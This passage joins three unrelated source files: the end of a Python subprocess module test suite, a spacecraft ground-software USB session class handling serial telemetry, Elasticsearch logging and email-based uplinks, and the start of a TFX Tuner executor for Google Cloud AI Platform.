                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass
        # p should have been wait()ed on, and removed from the _active list
        self.assertRaises(OSError, os.waitpid, pid, 0)
        self.assertNotIn(ident, [id(o) for o in subprocess._active])

    def test_pipe_cloexec(self):
        # Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
        # and are not inherited by another child process.
        p1 = subprocess.Popen([sys.executable, "-c",
                               'import os;'
                               'os.read(0, 1)'
                               ],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE)
        # Second child tries to close p1's pipe FDs by number; it must get
        # EBADF for each (proving they were not inherited) to exit 0.
        p2 = subprocess.Popen([sys.executable, "-c", """if True:
                               import os, errno, sys
                               for fd in %r:
                                   try:
                                       os.close(fd)
                                   except OSError as e:
                                       if e.errno != errno.EBADF:
                                           raise
                                   else:
                                       sys.exit(1)
                               sys.exit(0)
                               """ % [f.fileno() for f in
                                      (p1.stdin, p1.stdout, p1.stderr)]
                               ],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, close_fds=False)
        p1.communicate('foo')
        _, stderr = p2.communicate()
        self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))


@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):

    def test_startupinfo(self):
        # startupinfo argument
        # We uses hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USESHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = SW_MAXIMIZE
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_creationflags(self):
        # creationflags argument
        CREATE_NEW_CONSOLE = 16
        sys.stderr.write(" a DOS box should flash briefly ...\n")
        subprocess.call(sys.executable +
                        ' -c "import time; time.sleep(0.25)"',
                        creationflags=CREATE_NEW_CONSOLE)

    def test_invalid_args(self):
        # invalid arguments should raise ValueError
        # (preexec_fn and close_fds-with-redirection are POSIX-only features)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          preexec_fn=lambda: 1)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          stdout=subprocess.PIPE,
                          close_fds=True)

    def test_close_fds(self):
        # close file descriptors
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"],
                             close_fds=True)
        self.assertEqual(rc, 47)

    def test_shell_sequence(self):
        # Run command through the shell (sequence)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen(["set"], shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        self.addCleanup(p.stdout.close)
        self.assertIn("physalis", p.stdout.read())

    def test_shell_string(self):
        # Run command through the shell (string)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen("set", shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        self.addCleanup(p.stdout.close)
        self.assertIn("physalis", p.stdout.read())

    def test_call_string(self):
        # call() function with string argument on Windows
        rc = subprocess.call(sys.executable +
                             ' -c "import sys; sys.exit(47)"')
        self.assertEqual(rc, 47)

    def _kill_process(self, method, *args):
        # Helper: spawn a long-lived child, apply the given kill method
        # (send_signal/kill/terminate) and check it died abnormally.
        # Some win32 buildbot raises EOFError if stdin is inherited
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             time.sleep(30)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        getattr(p, method)(*args)
        _, stderr = p.communicate()
        self.assertStderrEqual(stderr, '')
        returncode = p.wait()
        self.assertNotEqual(returncode, 0)

    def _kill_dead_process(self, method, *args):
        # Helper: spawn a child that exits on its own, then verify that the
        # kill method does not raise when applied to the already-dead child.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             sys.exit(42)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        # The process should end after this
        time.sleep(1)
        # This shouldn't raise even though the child is now dead
        getattr(p, method)(*args)
        _, stderr = p.communicate()
        self.assertStderrEqual(stderr, b'')
        rc = p.wait()
        self.assertEqual(rc, 42)

    def test_send_signal(self):
        self._kill_process('send_signal', signal.SIGTERM)

    def test_kill(self):
        self._kill_process('kill')

    def test_terminate(self):
        self._kill_process('terminate')

    def test_send_signal_dead(self):
        self._kill_dead_process('send_signal', signal.SIGTERM)

    def test_kill_dead(self):
        self._kill_dead_process('kill')

    def test_terminate_dead(self):
        self._kill_dead_process('terminate')


@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
                     "poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
    # Re-runs the whole ProcessTestCase suite with poll() disabled so the
    # select()-based communicate() fallback gets exercised too.
    def setUp(self):
        subprocess._has_poll = False
        ProcessTestCase.setUp(self)

    def tearDown(self):
        subprocess._has_poll = True
        ProcessTestCase.tearDown(self)


class HelperFunctionTests(unittest.TestCase):
    @unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
    def test_eintr_retry_call(self):
        record_calls = []

        def fake_os_func(*args):
            # Records each call; raises EINTR exactly once (on call #2) so
            # the retry wrapper is forced to loop.
            record_calls.append(args)
            if len(record_calls) == 2:
                raise OSError(errno.EINTR, "fake interrupted system call")
            return tuple(reversed(args))

        self.assertEqual((999, 256),
                         subprocess._eintr_retry_call(fake_os_func, 256, 999))
        self.assertEqual([(256, 999)], record_calls)
        # This time there will be an EINTR so it will loop once.
        self.assertEqual((666,),
                         subprocess._eintr_retry_call(fake_os_func, 666))
        self.assertEqual([(256, 999), (666,), (666,)], record_calls)


@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces (BaseTestCase):

    def setUp(self):
        super(CommandsWithSpaces, self).setUp()
        # Create a helper script whose path contains a space ("te st...").
        f, fname = tempfile.mkstemp(".py", "te st")
        self.fname = fname.lower ()
        os.write(f, b"import sys;"
                    b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
        )
        os.close(f)

    def tearDown(self):
        os.remove(self.fname)
        super(CommandsWithSpaces, self).tearDown()

    def with_spaces(self, *args, **kwargs):
        # Run the helper script and check argv was split correctly despite
        # the spaces in the script path and arguments.
        kwargs['stdout'] = subprocess.PIPE
        p = subprocess.Popen(*args, **kwargs)
        self.addCleanup(p.stdout.close)
        self.assertEqual(
            p.stdout.read ().decode("mbcs"),
            "2 [%r, 'ab cd']" % self.fname
        )

    def test_shell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"), shell=1)

    def test_shell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)

    def test_noshell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"))

    def test_noshell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"])


def test_main():
    unit_tests = (ProcessTestCase,
                  POSIXProcessTestCase,
                  Win32ProcessTestCase,
                  ProcessTestCaseNoPoll,
                  HelperFunctionTests,
                  CommandsWithSpaces)

    test_support.run_unittest(*unit_tests)
    test_support.reap_children()


if __name__ == "__main__":
    test_main()
usb_session.py
import datetime
import serial
import threading
import json
import traceback
import queue
import os
import pty
import subprocess
import glob
from elasticsearch import Elasticsearch
import email
import imaplib

from .data_consumers import Datastore, Logger
from . import get_pio_asset
from .cases.utils import str_to_val
import lin


class USBSession(object):
    '''
    Represents a connection session with a Flight Computer's state system.

    This class is used by the simulation software and user command prompt to read and write to a
    flight computer's state.

    This object is thread-safe; if an instance of this class is shared between the MATLAB simulation
    interface (an instance of Simulation) and the user command line (an instance of StateCmdPrompt),
    they won't trip over each other in setting/receiving variables from the connected flight computer.
    '''

    class Request(object):
        """Helper object allows read-state request to USB session to be easily synchronized.

        The reading thread constructs a Request and blocks on `data`; the console-listener
        thread fills `data` exactly once when the device replies.
        """

        def __init__(self, field: str):
            super(USBSession.Request, self).__init__()

            self.__field = field
            self.__lock = threading.Lock()
            self.__has_reply = threading.Condition(self.__lock)
            self.__data = None

        @property
        def data(self) -> dict:
            # Blocks the caller until another thread fills the request via the setter.
            with self.__lock:
                while self.__data is None:
                    self.__has_reply.wait()
                return self.__data

        @data.setter
        def data(self, data: dict):
            # May be called at most once; None is not a legal fill value because
            # None is the "not yet filled" sentinel used by the getter.
            with self.__lock:
                assert self.__data is None, "Error; the request has already been filled"
                assert data is not None, "Error; a request must be filled with a value other than None"
                self.__data = data
                self.__has_reply.notify_all()

        @property
        def field(self) -> str:
            # Name of the state field this request is waiting on.
            return self.__field

    def __init__(self, device_name, uplink_console, port, is_teensy, simulation_run_dir,
                 tlm_config, radio_imei, scrape_uplinks, enable_auto_dbtelem):
        '''
        Initializes state session with a device.
        '''
        # Device connection
        self.device_name = device_name
        self.port = port
        self.is_teensy = is_teensy
        self.radio_imei = radio_imei

        # Uplink console
        self.uplink_console = uplink_console

        # Data logging
        self.datastore = Datastore(device_name, simulation_run_dir)
        self.logger = Logger(device_name, simulation_run_dir)
        self.raw_logger = Logger(device_name + "_raw", simulation_run_dir)
        self.telem_save_dir = simulation_run_dir

        # Spawn the downlink parser subprocess and talk to it over a pty pair,
        # treating our end as a serial console.
        downlink_parser_filepath = get_pio_asset("gsw_downlink_parser")
        master_fd, slave_fd = pty.openpty()
        self.downlink_parser = subprocess.Popen([downlink_parser_filepath], stdin=master_fd, stdout=master_fd)
        self.dp_console = serial.Serial(os.ttyname(slave_fd), 9600, timeout=1)
        # NOTE(review): duplicate assignment of telem_save_dir (already set above); kept as-is.
        self.telem_save_dir = simulation_run_dir

        self.uplink_json_name = "uplink"+self.radio_imei+".http"
        self.uplink_sbd_name = "uplink"+self.radio_imei+".sbd"

        # Open a connection to elasticsearch
        self.es = Elasticsearch([{'host':"127.0.0.1",'port':"9200"}])

        #connect to email
        self.scrape = scrape_uplinks
        self.username=tlm_config["email_username"]
        self.password=tlm_config["email_password"]
        self.mail = None
        self.enable_auto_dbtelem = enable_auto_dbtelem
        # Only log into the PAN Gmail account if credentials were configured.
        if self.username != "":
            self.mail = imaplib.IMAP4_SSL("imap.gmail.com", 993)
            self.mail.login(self.username, self.password)
            self.mail.select('"[Gmail]/Sent Mail"')

        self.debug_to_console = None

    def case_interaction_setup(self, _debug_to_console):
        # Toggle echoing of Flight Software debug messages to stdout (used by test cases).
        self.debug_to_console = _debug_to_console

    def connect(self, console_port, baud_rate):
        '''
        Starts serial connection to the desired device.

        Args:
        - console_port: Serial port to connect to.
        - baud_rate: Baud rate of connection.

        Returns True on success, False if the serial port could not be opened.
        Also starts the console-listener and uplink-scraper threads.
        '''
        try:
            self.console = serial.Serial(console_port, baud_rate)
            self.start_time = datetime.datetime.now() # This is t = 0 on the Teensy, +/- a few milliseconds.

            # Prevent multiple writes to the device at one time
            self.device_lock = threading.Lock()
            # Prevent multiple requests from being pushed to the queue at the same time
            self.request_lock = threading.Lock()
            self.requests = queue.Queue()

            self.datastore.start()
            self.logger.start()
            self.raw_logger.start()

            self.running_logger = True
            self.check_msgs_thread = threading.Thread(
                name=f"{self.device_name} logger thread",
                target=self.check_console_msgs)
            self.check_msgs_thread.start()

            self.scrape_uplinks_thread = threading.Thread(
                name=f"{self.device_name} uplinks",
                target=self.scrape_uplinks)
            self.scrape_uplinks_thread.start()

            print(f"Opened connection to {self.device_name}.")
        except serial.SerialException:
            print(f"Unable to open serial port for {self.device_name}.")
            return False

        return True

    def check_console_msgs(self):
        '''
        Read device output for debug messages and state variable updates. Record debug messages
        to the logging file, and update the console's record of the state.

        Runs on its own thread until `running_logger` is cleared by disconnect().
        '''
        while self.running_logger:
            try:
                # Read line coming from device and parse it
                if self.console.inWaiting() > 0:
                    line = self.console.readline().rstrip()
                    self.raw_logger.put("Received: " + line.decode("utf-8"))
                else:
                    continue

                data = json.loads(line)
                # Device timestamps ('t') are milliseconds since boot; convert to wall-clock.
                data['time'] = str(self.start_time + datetime.timedelta(milliseconds=data['t']))

                if 'msg' in data:
                    # The logline represents a debugging message created by Flight Software.
                    # Report the message to the logger.
                    logline = f"[{data['time']}] ({data['svrty']}) {data['msg']}"
                    self.logger.put(logline, add_time = False)

                    # If we want debug to go to the console
                    if self.debug_to_console:
                        print(logline)

                elif 'telem' in data:
                    logline = f"[{data['time']}] Received requested telemetry from spacecraft.\n"
                    logline += data['telem']
                    # print("\n" + logline)
                    self.logger.put(logline, add_time = False)

                    # log data to a timestamped file; 'telem' is a string of \xNN hex byte escapes.
                    telem_bytes = data['telem'].split(r'\x')
                    telem_bytes.remove("")
                    telem_file = open(os.path.join(self.telem_save_dir,
                                                   f"telem{self.radio_imei}[{data['time']}].txt"), "wb")
                    for byte in telem_bytes:
                        telem_file.write(int(byte, 16).to_bytes(1, byteorder='big'))
                    telem_file.close()

                elif 'uplink' in data:
                    if data['uplink'] and data['len']:
                        logline = f"[{data['time']}] Successfully sent telemetry to FlightSoftware.\n"
                        logline += str(data['uplink'])
                    else:
                        logline = f"[{data['time']}] Failed to send telemetry to FlightSoftware."
                    print("\n" + logline)
                    self.logger.put(logline, add_time = False)

                else:
                    if 'err' in data:
                        # The log line represents an error in retrieving or writing state data that
                        # was caused by a USBSession client improperly setting/retrieving a value.
                        # Report this failure to the logger.
                        logline = f"[{data['time']}] (ERROR) Tried to {data['mode']} state value named \"{data['field']}\" but encountered an error: {data['err']}"
                        self.logger.put(logline, add_time = False)
                        data['val'] = None
                    else:
                        # A valid telemetry field was returned. Manage it.
                        self.datastore.put(data)

                    # Chained assignment: pops the oldest pending Request AND fills it
                    # with this reply (also binding it to the local `request`).
                    # Assumes replies arrive in the same order requests were queued.
                    request = self.requests.get(block=False).data = data

            except ValueError:
                # Line was not valid JSON; log it raw.
                logline = f'[RAW] {line}'
                self.logger.put(logline)
            except serial.SerialException:
                print('Error: unable to read serial port for {}. Exiting.'.
                      format(self.device_name))
                self.disconnect()
            except:
                traceback.print_exc()
                print('Unspecified error. Exiting.')
                self.disconnect()

    def read_state(self, field, timeout = None):
        '''
        Read state.

        Read the value of the state field associated with the given field name on the flight controller.
        Blocks until the console-listener thread fills the request with the device's reply.
        '''
        if not self.running_logger:
            return

        json_cmd = {
            'mode': ord('r'),
            'field': str(field)
        }
        json_cmd = json.dumps(json_cmd) + "\n"

        request = USBSession.Request(field)
        with self.request_lock:
            self.requests.put(request, block=False)

        with self.device_lock:
            self.console.write(json_cmd.encode())
        self.raw_logger.put("Sent: " + json_cmd.rstrip())

        # Blocks until check_console_msgs fills the request.
        return request.data['val']

    def smart_read(self, field, **kwargs):
        '''
        Turns a string state field read into the actual desired vals.

        Returns list of vals, or the val itself.
        Vals can be bools, ints, or floats.

        Raises NameError if no state field was found.
        '''
        ret = self.read_state(field, kwargs.get('timeout'))
        if ret is None:
            raise NameError(f"State field: {field} not found.")

        # begin type inference
        return str_to_val(ret)

    def _write_state_basic(self, fields, vals, timeout = None):
        '''
        Write multiple state fields to the device at once.

        Returns True if the device echoed back the values that were written,
        False otherwise. Limited to 20 fields and a 512-byte command buffer
        by Flight Software.
        '''
        if not self.running_logger:
            return

        assert len(fields) == len(vals)
        assert len(fields) <= 20, "Flight Software can't handle more than 20 state field writes at a time"

        json_cmds = ""
        for field, val in zip(fields, vals):
            json_cmd = {
                'mode': ord('w'),
                'field': str(field),
                'val': self._val_to_str(val)
            }
            json_cmd = json.dumps(json_cmd) + "\n"
            json_cmds += json_cmd
        if len(json_cmds) >= 512:
            print("Error: Flight Software can't handle input buffers >= 512 bytes.")
            return False

        requests = [USBSession.Request(field) for field in fields]
        with self.request_lock:
            for request in requests:
                self.requests.put(request, block=False)

        with self.device_lock:
            self.console.write(json_cmds.encode())
        self.raw_logger.put("Sent: " + json_cmds)

        # Verify the write by comparing the echoed values against what was sent.
        returned_vals = [request.data['val'] for request in requests]
        if returned_vals[0] is None:
            return False
        returned_vals = returned_vals[0].split(",")
        returned_vals = [x for x in returned_vals if x != ""]
        if (returned_vals[0].replace('.','').replace('-','')).isnumeric():
            # Numeric comparison path: compare as floats to tolerate formatting differences.
            numeric_returned_vals = [float(x) for x in returned_vals]
            if type(vals[0]) == str:
                vals = vals[0]
                vals = [float(x) for x in vals.split(",") if x != '']
            return numeric_returned_vals == vals
        return returned_vals == vals

    def write_multiple_states(self, fields, vals, timeout=None):
        '''
        Write multiple states and check the write operation with feedback.

        Overwrite the value of the state field with the given state field name on the flight computer, and
        then verify that the state was actually set.
        '''
        # Filter out fields that are being overridden by the user
        field_val_pairs = [
            field_val_pair for field_val_pair in zip(fields, vals)
        ]
        fields, vals = zip(*field_val_pairs)
        return self._write_state_basic(list(fields), list(vals), timeout)

    def _val_to_str(self, val):
        '''
        Convert a state value or list of values into a single string writable to a state.
        Currently, the supported types are integers, doubles, integer vectors, double vectors, and
        booleans.
        '''
        # lin vectors are converted to plain lists first so they hit the sequence branch.
        if(type(val) in {lin.Vector2, lin.Vector3, lin.Vector4}):
            val = list(val)

        if type(val) not in (list, tuple):
            if type(val) is bool:
                return 'true' if val else 'false'
            else:
                return str(val)
        else:
            # Recursively join the elements with ", " and strip the trailing separator.
            val_str = ''
            for _val in val:
                val_str += self._val_to_str(_val) + ', '
            return val_str[:len(val_str) - 2]

    def write_state(self, field, *args, **kwargs):
        '''
        Write state and check write operation with feedback.

        Overwrite the value of the state field with the given state field name on the flight computer, and
        then verify that the state was actually set.
        '''
        return self.write_multiple_states([field], [self._val_to_str(args)], kwargs.get('timeout'))

    def send_uplink(self, filename):
        '''
        Gets the uplink packet from the given file. Sends the hex representation of the packet and
        the length of the packet to the console to be processed by FlightSoftware
        '''
        # Get the uplink packet from the uplink sbd file
        try:
            file = open(filename, "rb")
        except:
            # NOTE(review): the message does not include the missing filename; kept as-is.
            logline = f"Error: File (unknown) doesn't exist"
            self.raw_logger.put(logline)
            return False

        uplink_packet = file.read()
        uplink_packet_length = len(uplink_packet)
        file.close()
        uplink_packet = str(''.join(r'\x'+hex(byte)[2:] for byte in uplink_packet)) #get the hex representation of the packet bytes

        # Send a command to the console to process the uplink packet
        json_cmd = {
            'mode': ord('u'),
            'val': uplink_packet,
            'length': uplink_packet_length
        }
        json_cmd = json.dumps(json_cmd) + "\n"

        with self.device_lock:
            self.console.write(json_cmd.encode())
        self.raw_logger.put("Sent: " + json_cmd)
        return True

    def uplink(self, fields, vals, timeout=None):
        '''
        Create an uplink packet from the provided data and save it locally to disk.
        The send_uplink function can be used to send this uplink to the flight controller.

        Returns: false if the uplink could not be created, true otherwise. The
        uplink might not be possible to create if it uses unrecognized state fields
        or if its size exceeds 70 bytes.
        '''
        if not self.running_logger:
            return

        # Filter out fields that are being overridden by the user
        field_val_pairs = [
            field_val_pair for field_val_pair in zip(fields, vals)
        ]
        fields, vals = zip(*field_val_pairs)

        success = self.uplink_console.create_uplink(fields, vals, self.uplink_sbd_name,
                                                    self.uplink_json_name)

        # If the uplink packet exists, send it to the FlightSoftware console
        if success and os.path.exists(self.uplink_sbd_name):
            success &= self.send_uplink(self.uplink_sbd_name)
            # Clean up both the .sbd and .http artifacts after sending.
            os.remove(self.uplink_sbd_name)
            os.remove(self.uplink_json_name)
            return success
        else:
            if os.path.exists(self.uplink_json_name):
                os.remove(self.uplink_json_name)
            return False

    def parsetelem(self):
        '''
        Provide the latest downlink telemetry file that was received from the spacecraft
        to the downlink producer, and then return the parsed value of the latest completed
        downlink frame as a JSON object.
        '''
        #get newest file
        telem_files = glob.iglob(os.path.join(self.telem_save_dir, f'telem{self.radio_imei}*'))
        try:
            newest_telem_file = max(telem_files, key=os.path.basename)
        except ValueError:
            # max() raises ValueError on an empty iterator: no telemetry files yet.
            return "No telemetry to parse."

        self.dp_console.write((newest_telem_file+"\n").encode())
        line = self.dp_console.readline().rstrip()
        if line == b'':
            # TODO A MORE FORMAL FIX
            print("[ WARNING ] USB_SESSION LINE FIX")
            line = b'null'
        telem_json_data = json.loads(line)
        if telem_json_data is not None:
            try:
                data = telem_json_data['data']
                ### Attempt to extract metadata if it exists
                try:
                    metadata = telem_json_data['metadata']
                    print(metadata)
                except:
                    pass
                return data
            except:
                print("Error parsing telemetry data")
                # print("Printing meta data" + str(telem_json_data['metadata']))
        return None

    def dbtelem(self):
        '''
        Run parsetelem(), and dump the results into the Elasticsearch database. This
        function is useful because it allows database-connected technologies, such as
        the telemetry webserver and OpenMCT, to consume downlink data.

        Returns True only if every field was indexed successfully.
        '''
        jsonObj = self.parsetelem()
        if not isinstance(jsonObj, dict):
            # print(f"Error parsing telemetry on {self.device_name}")
            return False
        failed = False
        for field in jsonObj:
            value = jsonObj[field]
            data=json.dumps({
                field: value,
                "time.downlink_received": str(datetime.datetime.utcnow().isoformat())[:-3]+'Z'
            })
            res = self.es.index(index='statefield_report_'+str(self.radio_imei), doc_type='report', body=data)
            if not res['result'] == 'created':
                failed = True
        return not failed

    def scrape_uplinks(self):
        '''
        For the AMC tests, we need the Flight Computer to read sent uplinks without
        actually using Iridium. This method reads from the "sent" box in the PAN email
        account (attempted uplinks) and passes the uplink packet directly to the Flight computer.

        Thread entry point; loops until `scrape` is cleared or email is unavailable.
        '''
        while self.scrape == True and self.mail != None:
            self.scrape_uplink()

    def scrape_uplink(self):
        '''
        Look in the Sent Mail box of the Pan email account and forward all the
        uplinks directed to this satellite to the Flight Computer
        '''
        #look for all new emails from iridium
        try:
            self.mail.select('"[Gmail]/Sent Mail"')
        except:
            # Re-establish the IMAP connection if the select fails (e.g. timeout).
            self.mail = imaplib.IMAP4_SSL("imap.gmail.com", 993)
            self.mail.login(self.username, self.password)
            self.mail.select('"[Gmail]/Sent Mail"')

        _, data = self.mail.search(None, '(FROM "pan.ssds.qlocate@gmail.com")', '(UNSEEN)')

        mail_ids = data[0]
        id_list = mail_ids.split()

        for num in id_list:
            #.fetch() fetches the mail for given id where 'RFC822' is an Internet
            # Message Access Protocol.
            _, data = self.mail.fetch(num,'(RFC822)')

            #go through each component of data
            for response_part in data:
                if isinstance(response_part, tuple):
                    # converts message from byte literal to string removing b''
                    msg = email.message_from_bytes(response_part[1])
                    email_subject = msg['subject']

                    if email_subject.isdigit():
                        # Get imei number of the radio that the uplink was sent to
                        radio_imei = int(email_subject)

                        if self.radio_imei != None and radio_imei == int(self.radio_imei):
                            # Go through the email contents
                            for part in msg.walk():
                                if part.get_content_maintype() == 'multipart':
                                    continue
                                if part.get('Content-Disposition') is None:
                                    continue

                                # Check if there is an email attachment
                                if part.get_filename() is not None:
                                    # Download uplink packet from email attachment and send it
                                    # to the Flight Computer
                                    fp = open("new_" + self.uplink_sbd_name, 'wb')
                                    fp.write(part.get_payload(decode=True))
                                    fp.close()

                                    self.send_uplink("new_"+self.uplink_sbd_name)
                                    os.remove("new_"+self.uplink_sbd_name)
                        else:
                            # Mark message as unseen again if it wasn't addressed to this satellite
                            self.mail.store(num, '-FLAGS', '\SEEN')
        return True

    def disconnect(self):
        '''Quits the program and stores message log and field telemetry to file.'''

        print(f' - Terminating console connection to and saving logging/telemetry data for {self.device_name}.')

        # End threads
        self.running_logger = False
        self.check_msgs_thread.join()
        self.scrape = False
        self.scrape_uplinks_thread.join()
        self.console.close()
        self.dp_console.close()

        self.datastore.stop()
        self.logger.stop()
        self.raw_logger.stop()

        print(f' - Finished terminating for {self.device_name}.')
executor.py
# Lint as: python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper class to start TFX Tuner as a Job on Google Cloud AI Platform."""

import datetime
import json
import multiprocessing
import os
from typing import Any, Dict, List, Text

from absl import logging
from tfx import types
from tfx.components.tuner import executor as tuner_executor
from tfx.dsl.components.base import base_executor
from tfx.extensions.google_cloud_ai_platform import runner
from tfx.extensions.google_cloud_ai_platform.trainer import executor as ai_platform_trainer_executor
from tfx.types import standard_component_specs
from tfx.utils import json_utils

# Directory to store intermediate hyperparamter search progress.
# TODO(b/160188053): Use the same temp dir as the calling Executor.
TUNING_ARGS_KEY = 'ai_platform_tuning_args'
_WORKING_DIRECTORY = '/tmp'


class Executor(base_executor.BaseExecutor):
  """Tuner executor that launches parallel tuning flock on Cloud AI Platform.

  This executor starts a Cloud AI Platform (CAIP) Training job with a flock
  of workers, where each worker independently executes Tuner's search loop on
  the single machine.

  Per KerasTuner's design, distributed Tuner's identity is controlled by the
  environment variable (KERASTUNER_TUNER_ID) to each workers in the CAIP
  training job. Those environment variables are configured in each worker of
  CAIP training job's worker flock.

  In addition, some implementation of KerasTuner requires a separate process
  to centrally manage the state of tuning (called as 'chief oracle') which is
  consulted by all workers according as another set of environment variables
  (KERASTUNER_ORACLE_IP and KERASTUNER_ORACLE_PORT).

  In summary, distributed tuning flock by Cloud AI Platform Job is structured
  as follows.

  Executor.Do() -> launch _Executor.Do() on a possibly multi-worker CAIP job
      -> -+> master -> _search() (-> create a subprocess -> run the chief oracle.)
          |                      +> trigger a single tuner.search()
          +> worker -> _search() -> trigger a single tuner.search()
          +> worker -> _search() -> trigger a single tuner.search()
  """

  # TODO(b/160013376): Refactor common parts with Trainer Executor.
  def Do(self, input_dict: Dict[Text, List[types.Artifact]],
         output_dict: Dict[Text, List[types.Artifact]],
         exec_properties: Dict[Text, Any]) -> None:
    """Starts a Tuner component as a job on Google Cloud AI Platform."""
    self._log_startup(input_dict, output_dict, exec_properties)

    custom_config = json_utils.loads(
        exec_properties.get(standard_component_specs.CUSTOM_CONFIG_KEY, 'null'))
    if custom_config is None:
      raise ValueError('custom_config is not provided')

    if not isinstance(custom_config, Dict):
      raise TypeError('custom_config in execution properties must be a dict, '
                      'but received %s' % type(custom_config))

    training_inputs = custom_config.get(TUNING_ARGS_KEY)
    if training_inputs is None:
      err_msg = ('\'%s\' not found in custom_config.' % TUNING_ARGS_KEY)
      logging.error(err_msg)
      raise ValueError(err_msg)
    # Copy so the overrides below don't mutate the caller's config.
    training_inputs = training_inputs.copy()

    tune_args = tuner_executor.get_tune_args(exec_properties)

    num_parallel_trials = (1 if not tune_args else tune_args.num_parallel_trials)
    if num_parallel_trials > 1:
      # Chief node is also responsible for conducting tuning loop.
      desired_worker_count = num_parallel_trials - 1

      if training_inputs.get('workerCount') != desired_worker_count:
        logging.warning('workerCount is overridden with %s',
                        desired_worker_count)
        training_inputs['workerCount'] = desired_worker_count

      training_inputs['scaleTier'] = 'CUSTOM'
      training_inputs['masterType'] = (
          training_inputs.get('masterType') or 'standard')
      training_inputs['workerType'] = (
          training_inputs.get('workerType') or 'standard')

    # 'tfx_tuner_YYYYmmddHHMMSS' is the default job ID if not specified.
    job_id = (
        custom_config.get(ai_platform_trainer_executor.JOB_ID_KEY) or
        'tfx_tuner_{}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S')))

    # TODO(b/160059039): Factor out label creation to a utility function.
    executor_class = _WorkerExecutor
    executor_class_path = '%s.%s' % (executor_class.__module__,
                                     executor_class.__name__)

    # Note: exec_properties['custom_config'] here is a dict.
    return runner.start_aip_training(input_dict, output_dict, exec_properties,
                                     executor_class_path, training_inputs,
                                     job_id)


def _need_chief_oracle(exec_properties: Dict[Text, Any]) -> bool:
  """Returns True if the Tuner instance requires a chief oracle."""
  # TODO(b/160902662): Skip chief oracle for CloudTuner that does not require
  #                    chief oracle for distributed tuning (it is a no-op,
  #                    because it simply forwards to the AI Platform Optimizer
  #                    service).
  del exec_properties
  return True


class _WorkerExecutor(base_executor.BaseExecutor):
  """TFX Tuner executor impl as a worker in a Google Cloud AI Platform job."""

  def _start_chief_oracle_in_subprocess(
      self, input_dict: Dict[Text, List[types.Artifact]],
      exec_properties: Dict[Text, List[types.Artifact]]):
    """Starts a chief oracle in a subprocess."""

    def _run_chief_oracle() -> None:
      """Invoke chief oracle, and listen to the open port."""
      logging.info('chief_oracle() starting...')

      # Per KerasTuner's specification, configuration of chief oracle is set
      # by environment variables. This only affects the current sub-process
      # which is single-threaded, but not the main process. As such, mutation
      # of this otherwise global state is safe.
      os.environ['KERASTUNER_ORACLE_IP'] = '0.0.0.0'
      os.environ['KERASTUNER_ORACLE_PORT'] = self._master_port
      os.environ['KERASTUNER_TUNER_ID'] = 'chief'

      logging.info('Binding chief oracle server at: %s:%s',
                   os.environ['KERASTUNER_ORACLE_IP'],
                   os.environ['KERASTUNER_ORACLE_PORT'])

      # By design of KerasTuner, chief oracle blocks forever. Ref.
